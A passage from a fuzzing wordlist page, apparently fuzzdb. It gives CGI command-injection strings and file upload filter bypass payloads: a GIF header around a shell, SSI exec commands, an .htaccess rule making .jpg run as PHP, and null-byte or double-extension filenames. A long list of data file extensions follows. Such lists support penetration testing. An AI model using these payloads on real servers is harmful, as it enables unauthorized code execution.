hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 10 April 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{PREFIX}/templates_compiled/&lt;br /&gt;
{PREFIX}/templates_c/&lt;br /&gt;
{PREFIX}/templates/&lt;br /&gt;
{PREFIX}/temporary/&lt;br /&gt;
{PREFIX}/images/&lt;br /&gt;
{PREFIX}/cache/&lt;br /&gt;
{PREFIX}/temp/&lt;br /&gt;
{PREFIX}/files/&lt;br /&gt;
{PREFIX}/tmp/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
